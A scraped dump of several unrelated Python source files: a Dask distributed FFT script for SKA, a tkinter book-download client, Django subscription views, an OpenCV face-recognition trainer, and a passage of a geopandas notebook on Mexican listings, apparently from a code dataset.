NMBF_NMBF[i0][i1][j0][j1],\n distr_fft_class.facet_off[j0],\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n tmp_facet = distr_fft_class.add_facet_contribution(\n tmp_axis_0,\n distr_fft_class.facet_off[j1],\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n # Add two facets using Dask delayed (if use_dask = True)\n summed_facet = add_two(\n summed_facet, tmp_facet, use_dask=use_dask, nout=1\n )\n\n approx_subgrid[i0][i1] = distr_fft_class.finish_subgrid(\n summed_facet,\n [base_arrays.subgrid_A[i0], base_arrays.subgrid_A[i1]],\n use_dask=use_dask,\n nout=1,\n )\n\n return approx_subgrid\n\n\ndef _run_algorithm(\n subgrid_2,\n facet_2,\n distr_fft_class,\n base_arrays,\n use_dask,\n version_to_run=3,\n):\n \"\"\"\n Run facet-to-subgrid and subgrid-to-facet algorithm.\n\n Facet-to-subgrid has three versions, which iterate through facets\n and subgrids in different ways. They differ in how long they run for.\n The three approaches:\n - differ in when facet is prepared and which axis is run first\n - all give the same result, but with a different speed\n - #1 is slowest, because that prepares all facets first,\n which substantially increases their size and hence, puts a\n large amount of data into the following loops\n\n Subgrid-to-facet only has a single version.\n\n :param subgrid_2: 2D numpy array of subgrids\n :param facet_2: 2D numpy array of facets\n :param distr_fft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class object\n :param use_dask: use dask.delayed or not\n :param version_to_run: which facet-to-subgrid version (method)\n to run: 1, 2, or 3 (if not 1, or 2, it runs 3)\n \"\"\"\n log.info(\n \"%s x %s subgrids %s x %s facets\",\n distr_fft_class.nsubgrid,\n distr_fft_class.nsubgrid,\n distr_fft_class.nfacet,\n distr_fft_class.nfacet,\n )\n\n # ==== Facet to Subgrid ====\n log.info(\"Executing 2D facet-to-subgrid algorithm\")\n\n if version_to_run == 1:\n # Version #1\n t = time.time()\n approx_subgrid = facet_to_subgrid_2d_method_1(\n facet_2,\n distr_fft_class,\n base_arrays,\n use_dask=use_dask,\n )\n log.info(\"%s s\", time.time() - t)\n\n elif version_to_run == 2:\n # Version #2\n t = time.time()\n approx_subgrid = facet_to_subgrid_2d_method_2(\n facet_2,\n distr_fft_class,\n base_arrays,\n use_dask=use_dask,\n )\n log.info(\"%s s\", time.time() - t)\n\n else:\n # Version #3\n t = time.time()\n approx_subgrid = facet_to_subgrid_2d_method_3(\n facet_2,\n distr_fft_class,\n base_arrays,\n use_dask=use_dask,\n )\n log.info(\"%s s\", time.time() - t)\n\n # ==== Subgrid to Facet ====\n log.info(\"Executing 2D subgrid-to-facet algorithm\")\n # Celeste: This is based on the original implementation by Peter,\n # and has not involved data redistribution yet.\n\n t = time.time()\n approx_facet = subgrid_to_facet_algorithm(\n subgrid_2, distr_fft_class, base_arrays, use_dask=use_dask\n )\n log.info(\"%s s\", time.time() - t)\n\n return approx_subgrid, approx_facet\n\n\n# pylint: disable=too-many-arguments\n# TODO: Further refactor to optimise on the pylint errors\ndef run_distributed_fft(\n fundamental_params,\n to_plot=True,\n fig_name=None,\n use_dask=False,\n client=None,\n use_hdf5=False,\n hdf5_prefix=None,\n hdf5_chunksize=None,\n generate_random=False,\n source_number=10,\n facet_to_subgrid_method=3,\n):\n \"\"\"\n Main execution function that reads in the configuration,\n generates the source data, and runs the algorithm.\n\n :param fundamental_params: dictionary of fundamental parmeters\n chosen from swift_configs.py\n :param to_plot: run plotting?\n :param fig_name: If given, figures are saved with this prefix into\n PNG files. If to_plot is set to False,\n fig_name doesn't have an effect.\n :param use_dask: boolean; use Dask?\n :param client: Dask client or None\n :param use_hdf5: use Hdf5?\n :param hdf5_prefix: hdf5 path prefix\n :param hdf5_chunksize: hdf5 chunk size in tuple [size(G), size(FG)]\n :param generate_random: Whether to generate generic input data\n with random sources\n :param source_number: Number of random sources to add to input data\n :param facet_to_subgrid_method: which method to run\n the facet to subgrid algorithm\n\n :return: subgrid_2, facet_2, approx_subgrid, approx_facet\n when use_hdf5=False\n subgrid_2_file, facet_2_file, approx_subgrid_2_file,\n approx_facet_2_file when use_hdf5=True\n \"\"\"\n base_arrays = BaseArrays(**fundamental_params)\n distr_fft = StreamingDistributedFFT(**fundamental_params)\n\n log.info(\"== Chosen configuration\")\n log.info(distr_fft)\n\n if to_plot:\n plot_pswf(distr_fft, fig_name=fig_name)\n plot_work_terms(distr_fft, fig_name=fig_name)\n\n log.info(\"\\n== Generated layout (facets and subgrids): \\n\")\n log.info(\n \"%s subgrids, %s facets needed to cover the grid and image space\",\n distr_fft.nsubgrid,\n distr_fft.nfacet,\n )\n\n # The branch of using HDF5\n if use_hdf5:\n\n log.info(\"Use HDF5 to generate input data.\")\n hdf5_chunksize_G, hdf5_chunksize_FG = hdf5_chunksize\n G_2_file = f\"{hdf5_prefix}/G_{base_arrays.N}_{hdf5_chunksize_G}.h5\"\n FG_2_file = f\"{hdf5_prefix}/FG_{base_arrays.N}_{hdf5_chunksize_FG}.h5\"\n approx_G_2_file = (\n f\"{hdf5_prefix}/approx_G_{base_arrays.N}_{hdf5_chunksize_G}.h5\"\n )\n approx_FG_2_file = (\n f\"{hdf5_prefix}/approx_FG_{base_arrays.N}_{hdf5_chunksize_FG}.h5\"\n )\n\n for hdf5_file in [G_2_file, FG_2_file]:\n if os.path.exists(hdf5_file):\n log.info(\"Using hdf5 file: %s\", hdf5_file)\n else:\n raise FileNotFoundError(\n f\"Please check if the hdf5 data is in the {hdf5_file}\"\n )\n\n subgrid_2, facet_2 = make_subgrid_and_facet_from_hdf5(\n G_2_file,\n FG_2_file,\n base_arrays,\n use_dask=use_dask,\n )\n approx_subgrid, approx_facet = _run_algorithm(\n subgrid_2,\n facet_2,\n distr_fft,\n base_arrays,\n use_dask=use_dask,\n version_to_run=facet_to_subgrid_method,\n )\n\n errors_facet_to_subgrid = errors_facet_to_subgrid_2d_dask(\n approx_subgrid,\n distr_fft,\n subgrid_2,\n use_dask=use_dask,\n )\n\n errors_subgrid_to_facet = errors_subgrid_to_facet_2d_dask(\n approx_facet,\n facet_2,\n distr_fft,\n use_dask=use_dask,\n )\n\n approx_G_2_file, approx_FG_2_file = write_hdf5(\n approx_subgrid,\n approx_facet,\n approx_G_2_file,\n approx_FG_2_file,\n base_arrays,\n hdf5_chunksize_G,\n hdf5_chunksize_FG,\n use_dask=use_dask,\n )\n\n if use_dask:\n (\n errors_facet_to_subgrid,\n errors_subgrid_to_facet,\n approx_G_2_file,\n approx_FG_2_file,\n ) = dask.compute(\n errors_facet_to_subgrid,\n errors_subgrid_to_facet,\n approx_G_2_file,\n approx_FG_2_file,\n sync=True,\n )\n\n log.info(\n \"errors_facet_to_subgrid RMSE: %s (image: %s)\",\n errors_facet_to_subgrid[0],\n errors_facet_to_subgrid[1],\n )\n\n log.info(\n \"errors_subgrid_to_facet RMSE: %s (image: %s)\",\n errors_subgrid_to_facet[0],\n errors_subgrid_to_facet[1],\n )\n\n return G_2_file, FG_2_file, approx_G_2_file, approx_FG_2_file\n\n if generate_random:\n\n log.info(\n \"Make subgrid and facet using random %s sources\", source_number\n )\n\n G_2, FG_2 = generate_input_data(distr_fft, source_count=source_number)\n\n if use_dask and client is not None:\n G_2 = client.scatter(G_2)\n FG_2 = client.scatter(FG_2)\n subgrid_2, facet_2 = make_subgrid_and_facet(\n G_2,\n FG_2,\n base_arrays, # still use object,\n dims=2,\n use_dask=use_dask,\n )\n else:\n log.info(\n \"Make subgrid and facet using just one source. \"\n \"For scaling tests purposes only.\"\n )\n sources = [(1, 1, 0)]\n subgrid_2, facet_2 = make_subgrid_and_facet_from_sources(\n sources, base_arrays, use_dask=use_dask\n )\n\n if use_dask:\n approx_subgrid, approx_facet = _run_algorithm(\n subgrid_2,\n facet_2,\n distr_fft,\n base_arrays,\n use_dask=True,\n version_to_run=facet_to_subgrid_method,\n )\n\n subgrid_2, facet_2, approx_subgrid, approx_facet = dask.compute(\n subgrid_2, facet_2, approx_subgrid, approx_facet, sync=True\n )\n\n subgrid_2 = numpy.array(subgrid_2)\n facet_2 = numpy.array(facet_2)\n approx_subgrid = numpy.array(approx_subgrid)\n approx_facet = numpy.array(approx_facet)\n\n else:\n approx_subgrid, approx_facet = _run_algorithm(\n subgrid_2,\n facet_2,\n distr_fft,\n base_arrays,\n use_dask=False,\n version_to_run=facet_to_subgrid_method,\n )\n\n errors_facet_to_subgrid_2d(\n approx_subgrid,\n distr_fft,\n subgrid_2,\n to_plot=to_plot,\n fig_name=fig_name,\n )\n\n errors_subgrid_to_facet_2d(\n approx_facet,\n facet_2,\n distr_fft,\n to_plot=to_plot,\n fig_name=fig_name,\n )\n\n return subgrid_2, facet_2, approx_subgrid, approx_facet\n\n\ndef cli_parser():\n \"\"\"\n Parse command line arguments\n\n :return: argparse\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Distributed Fast Fourier Transform\",\n fromfile_prefix_chars=\"@\",\n )\n parser.add_argument(\n \"--swift_config\",\n type=str,\n default=\"1k[1]-n512-256\",\n help=\"Dictionary key from swift_configs.py corresponding \"\n \"to the configuration we want to run the algorithm for.\"\n \"If coma-separated list of strings, then the code \"\n \"will iterate through each key. \"\n \"e.g. '12k[1]-n6k-512,10k[1]-n5k-512,8k[1]-n4k-512'\",\n )\n\n parser.add_argument(\n \"--use_hdf5\",\n type=str,\n default=\"False\",\n help=\"use hdf5 to save G /FG, approx G /FG in large scale\",\n )\n\n parser.add_argument(\n \"--hdf5_chunksize\",\n type=int,\n default=256,\n help=\"hdf5 chunksize for G and FG\",\n )\n\n parser.add_argument(\n \"--hdf5_prefix\", type=str, default=\"./\", help=\"hdf5 path prefix\"\n )\n\n parser.add_argument(\n \"--generate_random_sources\",\n type=str,\n default=\"False\",\n help=\"Whether to generate generic input data with random sources\",\n )\n\n parser.add_argument(\n \"--source_number\",\n type=int,\n default=10,\n help=\"Number of random sources to add to input data\",\n )\n\n parser.add_argument(\n \"--facet_to_subgrid_method\",\n type=str,\n default=\"3\",\n help=\"which facet to subgrid method to run. \"\n \"Options are 1,2 and 3, see documentation for details\",\n )\n\n return parser\n\n\ndef main(args):\n \"\"\"\n Main function to run the Distributed FFT\n \"\"\"\n # Fixing seed of numpy random\n numpy.random.seed(123456789)\n\n scheduler = os.environ.get(\"DASK_SCHEDULER\", None)\n log.info(\"Scheduler: %s\", scheduler)\n\n swift_config_keys = args.swift_config.split(\",\")\n # check that all the keys are valid\n for c in swift_config_keys:\n try:\n SWIFT_CONFIGS[c]\n except KeyError as error:\n raise KeyError(\n f\"Provided argument ({c}) does not match any swift \"\n f\"configuration keys. Please consult src/swift_configs.py \"\n f\"for available options.\"\n ) from error\n\n try:\n version = int(args.facet_to_subgrid_method)\n except ValueError:\n log.info(\"Invalid facet to subgrid method. Use default instead.\")\n version = 3\n\n dask_client = set_up_dask(scheduler_address=scheduler)\n\n for config_key in swift_config_keys:\n log.info(\"Running for swift-config: %s\", config_key)\n\n with performance_report(filename=f\"dask-report-{config_key}.html\"):\n run_distributed_fft(\n SWIFT_CONFIGS[config_key],\n to_plot=False,\n use_dask=True,\n client=dask_client,\n use_hdf5=args.use_hdf5 == \"True\",\n hdf5_prefix=args.hdf5_prefix,\n hdf5_chunksize=[args.hdf5_chunksize, args.hdf5_chunksize],\n generate_random=args.generate_random_sources == \"True\",\n source_number=args.source_number,\n facet_to_subgrid_method=version,\n )\n dask_client.restart()\n tear_down_dask(dask_client)\n\n\nif __name__ == \"__main__\":\n dfft_parser = cli_parser()\n parsed_args = dfft_parser.parse_args()\n main(parsed_args)\n","repo_name":"ska-telescope/ska-sdp-distributed-fourier-transform","sub_path":"src/ska_sdp_exec_swiftly/fourier_transform_dask.py","file_name":"fourier_transform_dask.py","file_ext":"py","file_size_in_byte":30428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23427531434","text":"import webbrowser\n\nfrom Manager import *\nfrom windows.AboutWindow import *\nfrom windows.HelpWindow import *\nfrom windows.SettingsWindow import *\nfrom windows.Alerts import *\n\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom tkinter import filedialog\n\n\nclass MainApp(tk.Tk):\n def __init__(self):\n super().__init__()\n\n self.download_alert = None\n self.selected_row_id = None\n self.current_query = None\n self.current_query_type = None\n self.search_results = {}\n self.search_IDs = {}\n\n self.title(Manager.get_title())\n self.geometry(f'1024x768+433+150')\n\n self.queryType = tk.IntVar()\n\n self.__add_components()\n self.__configure_components()\n\n def __add_components(self):\n # Menu\n self.mMenu = tk.Menu(self)\n self.mMenu.add_cascade(label=Manager.get_name('settings'), command=self.settings_window)\n self.mMenu.add_cascade(label=Manager.get_name('help'), command=self.help_window)\n self.mMenu.add_cascade(label=Manager.get_name('about'), command=self.about_window)\n\n # Frame 1\n self.frame1 = tk.Frame(self)\n\n self.lQuery = tk.Label(self.frame1, text=Manager.get_name('query'))\n self.eQuery = tk.Entry(self.frame1)\n self.bSearch = tk.Button(self.frame1, text=Manager.get_name('search'), command=self.on_button_search)\n self.lType = tk.Label(self.frame1, text=Manager.get_name('type'))\n\n # Frame 2\n self.frame2 = tk.Frame(self.frame1)\n self.rAuthor = tk.Radiobutton(self.frame2, text=Manager.get_name('author'), variable=self.queryType,\n value=QueryType.AUTHOR.value)\n self.rBook = tk.Radiobutton(self.frame2, text=Manager.get_name('book'), variable=self.queryType,\n value=QueryType.BOOK.value)\n\n # Frame 3\n self.frame3 = tk.Frame(self)\n self.lResults = tk.Label(self.frame3, text=Manager.get_name('results'))\n self.tResults = tk.ttk.Treeview(self.frame3, show='headings',\n columns=('1', Manager.get_name('author'), Manager.get_name('book')))\n self.scrollResults = tk.Scrollbar(self.tResults, orient=tk.VERTICAL, command=self.tResults.yview)\n\n # Frame 4\n self.frame4 = tk.Frame(self)\n self.lStatus = tk.Label(self.frame4, text=Manager.get_name('ready'))\n self.bDownloadSelected = tk.Button(self.frame4, text=Manager.get_name('downloadSelected'),\n command=self.on_download_selected)\n\n def __configure_components(self):\n self.config(menu=self.mMenu)\n\n # Frame 1\n self.lQuery.grid(row=0, column=0, sticky='w')\n self.eQuery.grid(row=0, column=1, sticky='nsew', padx=3, pady=3)\n self.eQuery.bind('<Return>', self.on_button_search)\n self.bSearch.grid(row=0, column=2, sticky='nsew', padx=3)\n self.lType.grid(row=1, column=0, sticky='w')\n\n self.frame1.grid_rowconfigure(0, weight=1)\n self.frame1.grid_rowconfigure(1, weight=1)\n self.frame1.grid_columnconfigure(0, weight=3)\n self.frame1.grid_columnconfigure(1, weight=100)\n self.frame1.grid_columnconfigure(2, weight=7)\n\n # Frame 2\n self.rAuthor.pack(side=tk.LEFT)\n self.rBook.pack(side=tk.LEFT)\n self.frame2.grid(row=1, column=1, sticky='w')\n\n # Frame 3\n self.lResults.grid(row=0, column=0, sticky='w')\n self.tResults.grid(row=1, column=0, sticky='nsew', columnspan=2)\n\n self.tResults.heading('1', text='*')\n self.tResults.column('1', width=15, minwidth=30, stretch=tk.NO)\n self.tResults.heading(Manager.get_name('author'), text=Manager.get_name('author'))\n self.tResults.column(Manager.get_name('author'), width=200)\n self.tResults.heading(Manager.get_name('book'), text=Manager.get_name('book'))\n self.tResults.column(Manager.get_name('book'), width=551)\n self.tResults.bind('<Double-1>', self.on_search_result_dclick)\n self.tResults.bind('<Button-3>', self.on_search_result_rclick)\n\n self.frame3.grid_rowconfigure(0, weight=1)\n self.frame3.grid_rowconfigure(1, weight=50, pad=7)\n self.frame3.grid_columnconfigure(0, weight=6)\n self.frame3.grid_columnconfigure(1, weight=1)\n\n self.scrollResults.pack(side=tk.RIGHT, fill='y')\n self.tResults.configure(yscrollcommand=self.scrollResults.set)\n\n # Frame 4\n self.lStatus.pack(side=tk.LEFT)\n self.bDownloadSelected.pack(side=tk.RIGHT)\n\n # Result\n self.frame1.pack(side=tk.TOP, fill='x', padx=(7, 7), pady=(7, 0))\n self.frame3.pack(side=tk.TOP, fill='both', expand=True, padx=(7, 7), pady=(0, 7))\n self.frame4.pack(side=tk.TOP, fill='both', expand=False, padx=(10, 7), pady=(0, 7))\n\n def on_button_search(self, event=None):\n if self.eQuery.get() and self.queryType.get() != 0:\n self.current_query = self.eQuery.get()\n self.current_query_type = self.queryType.get()\n temp1 = SearchAlert(self)\n self.update()\n self.search_results = Manager.do_search(self.current_query, self.current_query_type)\n self.__update_results()\n temp1.destroy()\n self.lStatus.config(text=Manager.get_name('searchCompleted') + str(len(self.search_results)))\n if self.current_query_type == QueryType.AUTHOR.value:\n self.bDownloadSelected['state'] = tk.DISABLED\n else:\n self.bDownloadSelected['state'] = tk.NORMAL\n else:\n messagebox.showwarning(Manager.get_title(), Manager.get_name('emptyQuery'))\n\n def on_book_download(self, event=None):\n self.__create_download_alert()\n\n Manager.do_book_download(self.search_IDs[self.selected_row_id],\n Manager.get_config('bookFormat'),\n Manager.get_config('saveDir') if Manager.get_config('isSaveToDir')\n else filedialog.askdirectory(),\n self.__download_callback)\n self.download_alert.destroy()\n\n def on_book_download_in(self, event=None):\n self.__create_download_alert()\n Manager.do_book_download(self.search_IDs[self.selected_row_id],\n Manager.get_config('bookFormat'),\n filedialog.askdirectory(),\n self.__download_callback)\n self.download_alert.destroy()\n\n # Download selected books\n def on_download_selected(self, event=None, down_in=False):\n download_list = []\n if len(self.search_IDs) == 0:\n return\n for (item_id, link) in self.search_IDs.items():\n if self.tResults.item(item_id)['values'][0] == '*':\n download_list.append(link)\n if len(download_list) != 0:\n self.__create_download_alert()\n Manager.do_books_download(download_list,\n Manager.get_config('bookFormat'),\n Manager.get_config('saveDir') if Manager.get_config('isSaveToDir') and not down_in\n else filedialog.askdirectory(),\n self.__download_callback)\n self.download_alert.destroy()\n\n # Downloads all authors books\n def on_author_download(self, event=None):\n self.__author_transition()\n self.on_download_selected(down_in=False)\n\n def on_author_download_in(self, event=None):\n self.__author_transition()\n self.on_download_selected(down_in=True)\n\n # Marks book as to be downloaded\n def on_search_result_dclick(self, event):\n row_to_check = self.tResults.identify_row(event.y)\n if row_to_check:\n temp1 = self.tResults.item(row_to_check)['values']\n if not (temp1[1].startswith('-') or self.queryType.get() == QueryType.AUTHOR.value):\n if temp1[0] == '*':\n temp1[0] = ' '\n else:\n temp1[0] = '*'\n self.tResults.item(row_to_check, values=temp1)\n self.tResults.update()\n\n def on_search_result_rclick(self, event):\n self.selected_row_id = self.tResults.identify_row(event.y)\n if self.selected_row_id:\n if self.current_query_type == QueryType.BOOK.value:\n context_menu = self.create_book_context_menu()\n elif self.current_query_type == QueryType.AUTHOR.value:\n context_menu = self.create_author_context_menu()\n else:\n print('UNIMPLEMENTED')\n exit(1)\n context_menu.tk_popup(event.x_root, event.y_root)\n context_menu.grab_release()\n\n def create_book_context_menu(self):\n result = tk.Menu(self, tearoff=0)\n result.add_command(label=Manager.get_name('downloadBook'), command=self.on_book_download)\n result.add_separator()\n # result.add_command(label=Manager.get_name('viewAuthor'), command=self.on_view_author) TODO: Implement\n result.add_command(label=Manager.get_name('sDownloadBook'), command=self.on_book_download_in)\n result.add_command(label=Manager.get_name('openInBrowser'), command=self.on_open_browser)\n return result\n\n def create_author_context_menu(self):\n result = tk.Menu(self, tearoff=0)\n result.add_command(label=Manager.get_name('viewAuthor'), command=self.on_view_author)\n result.add_separator()\n result.add_command(label=Manager.get_name('downloadAllBooks'), command=self.on_author_download)\n result.add_command(label=Manager.get_name('sDownloadAllBooks'), command=self.on_author_download_in)\n result.add_command(label=Manager.get_name('openInBrowser'), command=self.on_open_browser)\n return result\n\n # Shows all authors books\n def on_view_author(self, event=None):\n self.eQuery.delete(0, tk.END)\n for e in self.search_results:\n if e[2] == self.search_IDs[self.selected_row_id]:\n self.eQuery.insert(0, e[1] if self.queryType == QueryType.BOOK.value else e[0])\n self.current_query_type = QueryType.BOOK.value\n self.queryType.set(QueryType.BOOK.value)\n self.search_results = Manager.do_get_authors_books(self.search_IDs[self.selected_row_id])\n self.bDownloadSelected['state'] = tk.NORMAL\n self.__update_results()\n\n def on_open_browser(self, event=None):\n webbrowser.open(Manager.get_url() + self.search_IDs[self.selected_row_id], new=0, autoraise=True)\n\n def __update_results(self):\n self.__clear_tree()\n\n for element in self.search_results:\n list_id = self.tResults.insert('', tk.END, values=('', element[0], element[1]))\n self.search_IDs[list_id] = element[2]\n\n def __clear_tree(self):\n for element in self.tResults.get_children():\n self.tResults.delete(element)\n self.search_IDs.clear()\n\n def __create_download_alert(self):\n self.download_alert = DownloadAlert(self)\n self.download_alert.attributes('-topmost', 'true')\n self.update()\n self.download_alert.grab_set()\n\n def __download_callback(self, value):\n assert self.download_alert is not None\n self.download_alert.progress_set(value)\n self.update()\n\n # Selects all author's books\n def __author_transition(self):\n self.on_view_author()\n for e in self.search_IDs.keys():\n temp1 = self.tResults.item(e)['values']\n if not temp1[1].startswith('-') or not self.queryType.get() == QueryType.AUTHOR.value:\n temp1[0] = '*'\n self.tResults.item(e, values=temp1)\n self.tResults.update()\n\n def about_window(self):\n new_window = AboutWindow(self)\n new_window.attributes('-topmost', 'true')\n new_window.grab_set()\n\n def help_window(self):\n new_window = HelpWindow(self)\n new_window.attributes('-topmost', 'true')\n new_window.grab_set()\n\n def settings_window(self):\n new_window = SettingsWindow(self)\n new_window.attributes('-topmost', 'true')\n new_window.grab_set()\n","repo_name":"InAnYan/flibustaClient","sub_path":"windows/MainApp.py","file_name":"MainApp.py","file_ext":"py","file_size_in_byte":12342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4435870562","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom .models import Category, Article\nfrom .forms import SubscribeForm, UnsubscribeForm\n\n\n@login_required\ndef subscribe(request):\n if request.method == 'POST':\n form = SubscribeForm(request.POST)\n if form.is_valid():\n categories = form.cleaned_data['categories']\n for category in categories:\n category.subscribers.add(request.user)\n return redirect('home') # Замените 'home' на URL вашей главной страницы\n else:\n form = SubscribeForm()\n return render(request, 'subscribe.html', {'form': form})\n\n\n@login_required\ndef unsubscribe(request):\n if request.method == 'POST':\n form = UnsubscribeForm(request.POST)\n if form.is_valid():\n categories = form.cleaned_data['categories']\n for category in categories:\n category.subscribers.remove(request.user)\n return redirect('home') # Замените 'home' на URL вашей главной страницы\n else:\n form = UnsubscribeForm()\n return render(request, 'unsubscribe.html', {'form': form})\n\n\ndef home(request):\n categories = Category.objects.all()\n articles = Article.objects.order_by('-created_at')[:5]\n return render(request, 'home.html', {'categories': categories, 'articles': articles})\n","repo_name":"dodu204/News_Portal_D9.5.4","sub_path":"news_portal/news_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4023036201","text":"import cv2 as cv\nimport os\nimport numpy as np\npeople=[]\ndirs=r'E:\\cv2programming\\facerecog\\train'\nfeatures=[]\nlabels=[]\nhcv=cv.CascadeClassifier('haarface.xml')\nfor i in os.listdir(r'E:\\cv2programming\\facerecog\\train'):\n people.append(i)\ndef training():\n for p in people:\n path=os.path.join(dirs,p)\n label=people.index(p)\n for i in os.listdir(path):\n img_path=os.path.join(path,i)\n img_array=cv.imread(img_path)\n gray=cv.cvtColor(img_array,cv.COLOR_BGR2GRAY)\n faces=hcv.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=4)\n for (x,y,w,h) in faces:\n froi=gray[y:y+h,x:x+w]\n features.append(froi)\n labels.append(label)\ntraining()\nprint(f'fearurelength={len(features)}')\nprint(f'labellength={len(labels)}')\nfeaturesarray=np.array(features,dtype='object')\nlabelsarray=np.array(labels)\nfacerecognizer=cv.face.LBPHFaceRecognizer_create()\nfacerecognizer.train(featuresarray,labelsarray)\nfacerecognizer.save('trainedface.yml')\nnp.save('features.npy',featuresarray)\nnp.save('labels.npy',labelsarray)","repo_name":"anirbanhati/cv2programming","sub_path":"facerecog/facetrain.py","file_name":"facetrain.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37000636592","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Campos involucrados\n# \n# - direccion\n# - idzona\n# - ciudad\n# - provincia\n# - lat\n# - lng\n# \n# ## Objetivos\n# \n# - Normalizar (provincia, ciudad, dirección)\n# - Agregar información (geometry)\n# - Métodos para graficar (cantidad+densidad)\n# - Método para definir si x publicación está en una geometry\n# \n# - Agregar información externa (distrito electoral, etc.)\n# \n\n# In[1]:\n\n\nimport pandas as pd\nimport geopandas\nimport matplotlib.pyplot as plt\nfrom shapely.geometry import Point, Polygon\n\n\n# In[2]:\n\n\n#importo las funciones para levantar los dataframes\nget_ipython().run_line_magic('run', '\"../../utils/dataset_parsing.ipynb\"')\n#importo las funciones para graficar\nget_ipython().run_line_magic('run', '\"../../utils/graphs.ipynb\"')\n\n\n# In[3]:\n\n\npais = geopandas.read_file(\"./MEX_adm/MEX_adm0.shp\")\nestados = geopandas.read_file(\"./MEX_adm/MEX_adm1.shp\")\nmunicipios = geopandas.read_file(\"./MEX_adm/MEX_adm2.shp\")\nciudades = geopandas.read_file(\"./México_Centros_Urbanos/México_Centros_Urbanos.shp\")\nmexico_polygon = pais.iloc[0][\"geometry\"]\n\n\n# In[4]:\n\n\ndf = levantar_datos(\"../../\"+DATASET_RELATIVE_PATH)\ndf[\"tiene_gps\"] = ~ (df[\"lat\"].isna() & df[\"lng\"].isna())\ncrear_punto = lambda x: Point(x[\"lng\"],x[\"lat\"]) if x[\"tiene_gps\"] else None\ndf[\"coord\"] = df.apply(crear_punto, axis=1)\n\n\n# In[ ]:\n\n\n\n\n\n# In[5]:\n\n\ndf[\"en_mexico\"] = df.loc[df[\"tiene_gps\"]][\"coord\"].map(esta_en_mexico)\n\n\n# In[6]:\n\n\ndf[\"en_mexico\"].value_counts()\n\n\n# In[7]:\n\n\ngeoDF = geopandas.GeoDataFrame(df.loc[df[\"tiene_gps\"] & df[\"en_mexico\"]], geometry=\"coord\")\n\n\n# In[8]:\n\n\ndef dibujar_mexico(puntos):\n grafico = pais.plot(figsize=(18,9))\n estados.plot(ax=grafico, color=\"white\")\n# municipios.plot(ax=grafico, color=\"white\")\n # ciudades.plot(ax=grafico, color=\"yellow\")\n puntos.plot(ax=grafico, color=\"green\")\n\n\n# In[9]:\n\n\ndef fix_provincias(df, provincias) -> bool:\n # le cambio los nombres a las siguientes provincias, para que coincidan con mi info geografica \n provincias_mapper = {\n \"Baja California Norte\": \"Baja California\",\n \"Edo. de México\": \"México\",\n \"San luis Potosí\": \"San Luis Potosí\"\n }\n df[\"estado\"] = df[\"provincia\"].map(lambda x: provincias_mapper.get(x, x))\n return set(df[\"provincia\"].dropna().unique()) == set(provincias[\"NAME_1\"]) #verifico\n\n\n# In[10]:\n\n\nfix_provincias(geoDF, estados)\n\n\n# In[11]:\n\n\ndef buscar_provincia(punto: Point, provincias):\n \"\"\"\n Devuelve en qué provincia de mexico se encuentra el punto.\n \"\"\"\n# if not punto: return None\n for provincia, geometry in provincias[[\"NAME_1\",\"geometry\"]].values:\n if geometry.contains(punto): return provincia\n\n# agrego las provincias faltantes\ngeoDF.loc[geoDF[\"estado\"].isna(), \"estado\"] = geoDF.loc[geoDF[\"estado\"].isna()][\"coord\"].map(lambda x: buscar_provincia(x, estados))\n\n\n# In[12]:\n\n\npublicaciones_por_estado = geoDF.loc[~geoDF[\"estado\"].isna()].groupby([\"estado\"]).agg({\"estado\":\"count\"})\npublicaciones_por_estado.columns = [\"publicaciones\"]\n\n\n# In[13]:\n\n\n# agrego datos de población al df de estados\ndf_poblacion = pd.read_csv(\"./poblacion_por_estado.csv\", index_col=\"NAME_1\")\nestados = estados.merge(on=\"NAME_1\", right=df_poblacion)\n\n\n# In[14]:\n\n\n# agrego datos de publicaciones al df de estados\nestados = estados.merge(left_on=\"NAME_1\", right_on=\"estado\", right=publicaciones_por_estado)\n\n\n# In[15]:\n\n\ndef choropleth_estados(estados, serie, nombre, titulo=\"\"):\n estados[nombre] = estados[\"NAME_1\"].map(serie)\n plot = estados.plot(column=nombre, legend=True, figsize=(24,8), cmap=\"Greens\") \n plot.set_title(titulo, fontdict={\"fontsize\": 18})\n plot.set_xlabel(\"Longitud\")\n plot.set_ylabel(\"Latitud\")\n return plot\n\n\n# In[16]:\n\n\nplot = choropleth_estados(estados, publicaciones_por_estado[\"publicaciones\"], \"publicaciones\", \"Cantidad de publicaciones por estado\")\nplot.figure.savefig(\"../graficos/map_publicaciones_por_estado.png\")\n\n\n# In[17]:\n\n\nplot = estados.plot(column=\"poblacion\", legend=True, figsize=(24,8), cmap=\"Greens\") \nplot.set_title(\"Población de México por estado\", fontdict={\"fontsize\": 18})\nplot.set_xlabel(\"Longitud\")\nplot.set_ylabel(\"Latitud\")\nplot.figure.savefig(\"../graficos/map_poblacion_por_estado.png\")\n\n\n# In[18]:\n\n\nestados[\"publicaciones_poblacion\"] = estados[\"publicaciones\"] / estados[\"poblacion\"]\nplot = estados.plot(column=\"publicaciones_poblacion\", legend=True, figsize=(24,8), cmap=\"Greens\") \nplot.set_title(\"Publicaciones por habitante en cada estado\", fontdict={\"fontsize\": 18})\nplot.set_xlabel(\"Longitud\")\nplot.set_ylabel(\"Latitud\")\nplot.figure.savefig(\"../graficos/map_publicaciones_por_habitante.png\")\n\n\n# # Presento un análisis del valor del metro cuadrado en relacion a la ciudad\n# ### Primero realizo una limpieza de los datos. Selecciono las ciudades con mayor cantidad de publicaciones\n\n# In[19]:\n\n\nmas_publicadas = df.groupby(\"ciudad\").agg({\"id\":\"count\"})\nmas_publicadas.columns = 